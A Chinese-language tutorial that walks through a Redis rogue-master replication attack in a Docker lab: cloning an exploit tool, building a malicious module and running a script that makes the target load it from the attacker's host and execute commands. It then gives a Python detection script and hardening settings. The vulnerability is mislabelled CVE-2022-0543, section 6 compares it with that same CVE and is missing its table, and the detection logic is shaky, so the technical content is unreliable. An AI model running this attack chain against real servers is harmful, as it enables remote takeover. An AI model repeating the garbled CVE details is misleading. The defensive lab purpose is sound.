从攻击到防御：手把手复现Redis主从复制RCE漏洞（CVE-2022-0543？），并教你写个简单的检测脚本

Redis主从复制RCE漏洞深度解析与实战检测方案

Redis作为高性能键值数据库的典型代表，其安全配置问题一直是攻防演练中的重点目标。去年曝光的Redis主从复制远程代码执行漏洞（CVE-2022-0543）因其利用链完整、影响范围广而备受关注。本文将带您深入漏洞机理，在隔离环境中完整复现攻击过程，并开发实用的自动化检测工具。

1. 漏洞背景与技术原理

Redis主从复制机制原本是为了实现数据高可用而设计的核心功能。当配置为主从模式时，从节点会自动同步主节点的所有数据变更。问题出在Redis 4.x/5.x版本对模块化扩展的支持上——攻击者可以构造恶意.so文件，通过主从同步机制将其传输到目标服务器并加载执行。

关键攻击链分析：

1. 攻击者搭建恶意主节点
2. 诱使目标Redis实例连接为主从关系
3. 通过FULLRESYNC同步机制传输恶意模块
4. 在目标服务器加载模块获得代码执行能力

与常见的未授权访问漏洞不同，该漏洞的特别之处在于：

• 即使配置了密码认证，只要开放主从复制端口仍可能受影响
• 利用过程不依赖web目录写入等传统方式
• 可绕过部分网络隔离策略

2. 漏洞复现环境搭建

推荐使用Docker快速构建隔离测试环境：

# 下载漏洞环境 git clone https://github.com/vulhub/vulhub.git cd vulhub/redis/4-unacc # 启动容器（修改默认端口避免冲突） sed -i 's/6379:6379/16379:6379/' docker-compose.yml docker-compose up -d

环境验证命令：

redis-cli -h 127.0.0.1 -p 16379 ping # 应返回 PONG 响应

3. 手工复现攻击全流程

3.1 准备恶意模块

使用RedisModulesSDK编译生成攻击载荷：

git clone https://github.com/n0b0dyCN/redis-rogue-getshell.git cd redis-rogue-getshell/RedisModulesSDK make

生成的exp.so文件即为包含系统命令执行功能的恶意模块。

3.2 建立恶意主节点

在攻击机上运行控制脚本：

python3 redis-master.py -r 目标IP -p 16379 -L 攻击机IP -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

参数说明：

• -r目标Redis地址
• -p目标Redis端口
• -L攻击机监听IP
• -P攻击机监听端口
• -f恶意模块路径
• -c要执行的系统命令

3.3 观察攻击效果

成功执行后，将在返回结果中看到命令输出：

[+] Connecting to 192.168.1.100:16379... [+] Sending SLAVEOF command... [+] Setting dbfilename... [+] Loading module... [+] Command result: root [+] Cleaning up...

4. 自动化检测脚本开发

基于Python编写检测工具，主要实现以下功能：

1. 识别Redis未授权访问
2. 检测主从复制功能开放状态
3. 验证是否存在命令执行风险

import redis import socket import argparse def check_unauth(host, port): try: r = redis.Redis(host=host, port=port, socket_timeout=5) return r.ping() except: return False def check_replication(host, port): try: s = socket.socket() s.connect((host, port)) s.send(b"INFO replication\r\n") data = s.recv(1024).decode() return "role:master" not in data except: return False def main(): parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", required=True) parser.add_argument("-p", "--port", default=6379, type=int) args = parser.parse_args() print(f"[*] 检测目标: {args.target}:{args.port}") if check_unauth(args.target, args.port): print("[!] 存在未授权访问漏洞") if check_replication(args.target, args.port): print("[!] 主从复制功能开放，可能存在RCE风险") else: print("[+] 主从复制功能未开放") else: print("[+] 未发现未授权访问") if __name__ == "__main__": main()

使用示例：

python3 redis_check.py -t 192.168.1.100 -p 16379

5. 防御加固方案

针对该漏洞的立体防护策略：

网络层控制：

• 限制Redis端口仅对可信IP开放
• 禁用非必需的主从复制端口

服务配置加固：

# redis.conf 关键配置 protected-mode yes requirepass "StrongPassword@123" rename-command CONFIG "" rename-command MODULE ""

运行时防护：

• 使用非root账户运行Redis服务
• 定期审计加载的模块列表
• 监控异常的FULLRESYNC同步请求

6. 漏洞关联分析

与CVE-2022-0543的异同点对比：

实际环境中发现，这两个漏洞经常被组合利用形成完整的攻击链。攻击者可能先通过未授权访问获取基础权限，再利用主从复制机制实现持久化控制。